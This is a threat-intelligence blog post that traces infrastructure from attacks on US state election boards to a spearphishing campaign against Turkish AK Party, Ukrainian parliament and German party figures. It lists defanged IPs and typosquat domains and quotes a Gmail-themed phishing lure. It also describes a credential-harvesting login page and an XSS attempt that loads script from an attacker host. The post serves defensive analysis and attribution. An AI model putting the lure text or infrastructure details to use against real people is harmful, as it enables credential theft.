Can a BEAR Fit Down a Rabbit Hole?

Can a BEAR Fit Down a Rabbit Hole?

ThreatConnect Identifies Infrastructure Nexus Between Attacks Against State Election Boards and Spearphishing Campaign Against Turkish, Ukrainian Governments

Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, and “Russian Cyber Operations on Steroids“.

The question on everyone’s mind: Who is behind the recently reported compromises of Arizona and Illinois’ state board of elections (SBOE)? The answer is, we don’t know.

When we reviewed FBI T-LD1004-TT, we initially found a pile of highly circumstantial evidence suggesting the adversary could be of Russian origin. The combination of the attacks relying on widely available open source tools and the superficial involvement of Russian infrastructure left us thinking Russian attribution was plausible but not certain as we were unable to determine if the attacks were criminally motivated or state sponsored with any confidence. We also were unable to identify any additional ties to malicious activity directed against any other state boards of election.

However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spearphishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi. As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.

The timing of this activity is notable, as in mid-July Wikileaks published approximately 300,000 emails purportedly obtained via a compromise of the Turkish Justice and Development (AK) Party’s computer systems. Therefore, we cannot definitively attribute the spearphishing campaign as the source of the leak. However, if Russian APT actors compromised and leaked AK Party emails, it would be consistent with Russian collection and influence operations that have recently focused on U.S. politics. Collection against the ruling Turkish party could provide Russia with intelligence that could potentially inform diplomatic relations and military efforts in Eastern Europe, ongoing military operations in Syria, while also potentially providing fodder for influence operations that could be used to publicly denigrate or defame politicians.

The graphic below visualizes what we know about the attacks by leveraging the Diamond Model of Intrusion Analysis (for a more whimsical example, see how we applied the Diamond Model to the destruction of the Death Star). The diamond in the center of the graphic shows the information originally shared about the attacks against the state boards of elections. The callout boxes radiating off the diamond highlight our main findings and their relevance to an attribution assessment.

Circumstantial Ties to Russia

Over the course of our research, we identified several strands that suggest – but do not prove – Russian origin:

Six of the eight IP addresses belong to a Russian-owned hosting service

5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015

Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks

The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).

Russian-Owned Hosting Service. Six of the domains identified in the FBI report are owned by King Servers (king-servers[.]com), a VPS/VDS hosting provider. While these IPs are physically located in the U.S. and The Netherlands, King Servers is based out of Russia and their website defaults to Russian language, as seen below. The use of a Russian VPS hosting service suggests, but does not definitively indicate, that the individuals behind the activity identified in the FBI report are Russian.

Additionally, DomainTools historical WHOIS information for the King Servers domain identifies that it was originally registered by “Vladimir Fomenko” from Biysk, Russia. A LinkedIn profile for Fomenko also identifies him as the CEO and founder of King Servers.

Tor Relay vs Tor Exit Node. One of the King Server IPs, 185.104.9[.]39, was running an active Tor relay in August, at the time that the FBI report states it was identified in the intrusion of “another state’s Board of Election system.” This relay is using the nickname “villariba“, and is actually not an exit node. This is significant because normally if an attacker was routing activity through Tor, the end IP identified in the intrusion should be the IP of an exit node; the fact that this IP has a Tor relay that is not an exit implies that the server at this IP address is either hosting an additional proxy service that was used by the attackers, or the attackers are actually controlling the server and may be in control of the Tor relay.

IOC Previously Hosted Russian Cybercrime Forum. One of the domains previously hosted at 5.149.249[.]172 was rubro[.]cc, which is expired. However, a historical entry for this website in the Wayback Machine dated August 13, 2015 shows an HTTP 301 redirect to the website https[:]//rubro[.]biz/. This Russian language website is called MarkeT RUBRO Ltd [sic.], and uses the Title “Форум rubro — Черный рынок криминал”, translating to “Forum rubro – Criminal Black Market.”

Other FortUnix Infrastructure Associated with BlackEnergy Activity. IP Addresses 5.149.254[.]114 and 5.149.248[.]67 (both Netherlands), which are owned by the same FortUnix Networks company as 5.149.249[.]172, were previously identified in a Sentinel report and VirusTotal respectively as being associated with BlackEnergyBot activity. Activity from these IPs have targeted the Ukrainian power grid and news media. Research into FortUnix Networks indicates that they are owned by HostZealot, a VPS and VDS hosting provider headquartered in Bulgaria, which operates at least 13 IP ranges in various European countries and Canada.

Overlap With Open Source Tools. The FBI report indicated that the attackers used Acunetix, SQL injection, and SQLmap to target the SBOE website(s). These tools and tactics, techniques, and procedures (TTPs) are consistent with those that @anpoland, a group that may be associated with Russian APT activity, used to scan the CAS’ website and exploit their databases. As these tools and methods are widely used, they are not attributable to one specific group; however, the timing of the SBOE and CAS activity suggests a circumstantial link between the two.

An Unexpected Development: 5.149.249[.]172 Hosting Spearphishing Attack Against Primarily Turkish, Ukrainian Government Targets

While we were unable to identify any additional information related to the state board of election attacks, reviewing hosting resolutions for the 5.149.249[.]172 IP address clued us into another target of these actors. Passive DNS analysis of this IP revealed domains typosquatting a website for Turkey’s ruling AK Party hosted between March and August 2016. Investigation of this typosquat took us down the rabbit hole that ultimately uncovered evidence of a recent spearphishing campaign primarily targeting individuals affiliated with Turkish and Ukrainian political organizations.

Passive DNS Analysis of 5.149.249[.]172 Two of the domains — akpartl.info[.]tr and supportmail.biz[.]tr — were hosted at the 5.149.249[.]172 IP address in 2016, during times consistent with the state board of election attacks. The akpartl.info[.]tr domain appears to spoof the legitimate domain belonging to the Turkish AK Party website, akparti.org[.]tr. At the time of writing, the spoofed domain redirects to a legitimate Turkish AK Party website akpartiistanbul[.]com.

The mail server for this spoofed domain, mail.akpartl.info[.]tr, leverages Moscow-based webmail provider Yandex as a mail exchanger. According to Shodan, this host is running a Simple Mail Transfer Protocol (SMTP) PostFix service.

The other domain recently hosted at the 5.149.249[.]172 IP address, supportmail.biz[.]tr, also appears to have been used against the Turkish AK Party. This domain currently redirects to the aforementioned akpartiistanbul[.]com legitimate domain.

Both of these domains were registered in January 2016 and later resolved to, and probably were operationalized from, the 5.149.249[.]172 IP address. This timing is significant as the AK Party was a recent victim of a July 2016 email leak by Wikileaks. However, to identify a more substantial link between 5.149.249[.]172 IP address and the ultimate leak on Wikileaks, we had to delve further into the akpartl.info[.]tr spoofed domain.

Chasing the Rabbit Down its Hole

Leveraging ThreatConnect’s Farsight Passive DNS integration, we were able to identify that several subdomains exist for the akpartl.info[.]tr spoofed domain, including ksdafoiuf9w54ygdjoi.akpartl.info[.]tr.

Visiting the ksdafoiuf9w54ygdjoi.akpartl.info[.]tr subdomain directs the visitor to ksdafoiuf9w54ygdjoi.akpartl.info[.]tr/admins/sign_in where an instance of Phishing Frenzy, an open source phishing framework, is running. Note the title and footer of the page in the screenshot below.

After some investigation, we navigated to hxxp://ksdafoiuf9w54ygdjoi.akpartl.info[.]tr/letter_opener, which displayed a list of what appears to be all of the emails these actors have sent in this campaign.

There were 113 emails listed between March 22, 2016 and August 03, 2016. The bulk of the emails were sent between March 22 and April 20, 2016.

From the 34 victim email addresses that were found on the command and control server, two stood out as unusual: ali.bolduin[@]yandex[.]com and deputat.babiy[@]gmail[.]com. These two email addresses were found in the very earliest phishing email templates. They do not appear to be connected with a specific target or individual found in the open source. We believe that these two addresses were used to test the phishing attacks before sending the spearphish to an actual target. The use of a Yandex account for testing purposes, coupled with akpartl.info[.]tr’s aforementioned use of a Yandex mail exchanger, provides evidence that the individuals behind this activity are clearly leveraging and abusing Russian services to test and carryout attacks.

Out of the 113 total emails, 48 of them are Gmail-themed, designed to look like Gmail security emails in order to collect a victim’s Google account information. The rest are specifically designed to look like an email from an organization with which the target is affiliated or ostensibly interested. At least 16 of the emails are designed to look like AK Party emails. There is one email that has a LinkedIn theme and another that is Intel Corporation themed. The email bodies are written in a variety of languages including Turkish, English, Ukrainian, and German. Based on the email bodies and the intended recipients, targets of this spearphishing campaign included individuals in the AK Party, Verkhovna Rada (Parliament) of Ukraine, and German Freedom Party (Die Freiheit). Of note, 16 of the AK Party officials targeted in this campaign show up in the July 19 WikiLeaks dump of nearly 300,000 AK Party emails that included over 1400 AK Party email accounts.

Included below are some screenshots of emails from this Phishing Frenzy site.

The gmail-themed emails, roughly translated, read something like:

“Hello user!

Your account is blocked for violating of terms of service of our company.

In the period from 03/29/2016 to 04/01/2016 it was observed that your account has sent mass email advertisements.

Perhaps you did not, and attackers using special programs to send spam, used your data (email address, name). If you have not sent any emails, go to this link and follow the instructions.

Your account is under control.

You can view and adjust your privacy settings at any time in Your account ..

Do not reply to this letter. If you have any questions, please contact technical support.

Technical Services Manager”

Almost all of the links in the phishing emails lead to a subdomain on the srvddd[.]com host, which currently has a handful of phishing domains resolving to it, like the one shown below.

srvddd[.]com was registered using the email address vittorio_80@mail[.]com and is currently hosted at the 5.149.248[.]193 IP address, which is in the same range as the aforementioned FortUnix Network IP addresses. While not unique, the use of a 1&1 mail.com email address to register a domain is a TTP consistent with recent FANCY BEAR activity. Based on passive DNS, there are several subdomains for the srvddd[.]com domain that most likely have been used in such operations dating back to November 2014. A DomainTools screenshot of srvddd[.]com dated May 9, 2015 shows a directory named “mail.solydarnist.org” was present on the server, suggesting it was used to target solydarnist[.]org, the official website of the political party of incumbent Ukrainian President Petro Oleksiyovych Poroshenko.

Another sample of a historical Ukraine related malicious targeting attempt using srvddd[.]com is found at http[:]//privatbank-info.io[.]ua/journal.php, where a user “bordan” posted an HTML tag inside a comment, attempting to induce a cross-site scripting (XSS) attack that would load the Javascript found at http[:]//onlysoop.srvddd[.]com/fone/script.js. This suggests that the domain may have been used for other attacks beyond the credential harvesting emails identified in the Phishing Frenzy campaign.

There is one link that does not direct to a subdomain of srvddd[.]com. Instead, this link points visitors to http://mail.akpartl.info[.]tr:35000/login2/loginpage – a credential harvesting page designed to look like a login page for a Kerio Connect webmail client. Submitting this form redirects victims to mail.akpartiistanbul[.]com:35000/webmail/login2/loginpage, the legitimate Kerio Connect login page for an actual AK Party website.

Based on these developments, we can expand our original diamond model graphic to show how new infrastructure and capabilities were leveraged to target additional victims.

Discussion, Analysis, and Conclusions

Since we started researching the DNC breach back in June, this story has taken us on one crazy turn after another. We have identified links between breaches and outlets for strategic leaks that give us greater confidence in our attribution assessments. That said, this chapter feels like the most bizarre yet and leaves us with more questions than answers, including:

How Widespread Is The Targeting Effort Against State Board of Elections? So far we know of two, but we do not know if Arizona and Illinois represent our sample size.

Does the Reliance on Open Source Tools Reflect an Inexperienced Adversary or an Adaptive Adversary? Using open source tools may identify an adversary that cannot create their own custom tools. It can also reflect an adversary that intentionally leverages open source tools for operational security purposes like avoiding attribution or the use of sensitive tools or methods.

Are the Attackers Really After Voter Registration Information or Was This a Phase One Operation? Without clear attribution to a specific actor or APT group, we cannot determine the actors’ motivations and what they would ultimately seek to do to or later target with any collected intelligence.

Is There a Relationship Between the AK Party Spearphishing Effort and the WikiLeaks Dump of AK Party Emails? There’s an overarching storyline that seems appealing here: a major political party in a country with a strained geopolitical relationship with Moscow gets hacked and large amounts of embarrassing data gets dumped on a leak website. However, there is much less evidence available to weigh with the AK Party emails than the DNC breach.

Further complicating the situation, Phineas Fisher, a hacktivist that gained notoriety for his hack against Gamma Group and Hacking Team, claimed he compromised the AK Party and provided their emails to Wikileaks. At this time, we cannot refute or verify Phineas Fisher’s claims and Wikileaks is the only authoritative source that can confirm his involvement. If Phineas Fisher’s claims are false, it would strengthen the argument that the Phishing Frenzy activity ultimately resulted in the leak. If Phineas Fisher’s claims are true, there are three conceivable explanations to the situation:

Phineas Fisher and the actors behind the activity in the FBI report both targeted and compromised the AK Party. Phineas Fisher was the only one to actually compromise the AK Party and none of the aforementioned Phishing Frenzy efforts were successful. Phineas Fisher and the actors behind the activity in the FBI report are connected.

If a Russian APT group is conducting this activity seeking to hack the ruling Turkish political party, collected intelligence and follow-on operations could ultimately allow for the following:

Informed Diplomatic Relations – Russia’s diplomatic relations with Turkey are integral based on their close proximity and Turkey’s status as a NATO member. Having insider intelligence from the ruling party detailing Turkey’s foreign relations and diplomatic efforts can inform Russia’s own foreign relations as well.

Informed Military Efforts – Turkey’s geographical location, situated south of Russia between the Middle East and Eastern Europe, means that it is a key piece to Russian military efforts in the region. For example, intelligence from the AK Party could ultimately inform Russia’s military preparations and actions in Syria.

Influence Operations or Leverage – Similar to Russian APT influence operations against the U.S. Democratic Party, Russia may seek to release some compromised intelligence to sway public opinion or defame political ideologies in a country that is integral to Russia’s foreign policy.

Retaliations or Leverage – As evidenced by Russia’s efforts against the World Anti-Doping Agency and CAS, Russia may seek to publicly or privately denigrate or influence individuals or organizations that cast a negative light on Russia. Similarly, sensitive and incriminating information that might be compromising could be held over party members’ or leaders’ heads with the threat of public disclosure.

So how did we get from the SBOE to Turkish AK Party? As you can see, it’s a long story, but the takeaway is this: Whether it is to ultimately collect intelligence, influence public opinion, or sow discord, doubt, or contempt with respect to political ideologies — the individuals behind this activity, whoever they may be, are looking to manipulate multiple countries’ democratic processes.

Based on the information available, it is unclear the degree of Russian sanction or sponsored involvement in either events, however it is clear that Russian-based infrastructure has been identified in part – and thus with Russia’s new “Yarovaya package“ authorities are now in a position to help fill in the missing details. Because a wise Russian once said “We in Russia are used to investigating first, before accusing anyone of anything. We believe it is more logical and more correct.“

ThreatConnect is sharing details of the indicators associated with this activity within ThreatConnect Incident 20160829C:

Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, and “Russian Cyber Operations on Steroids“.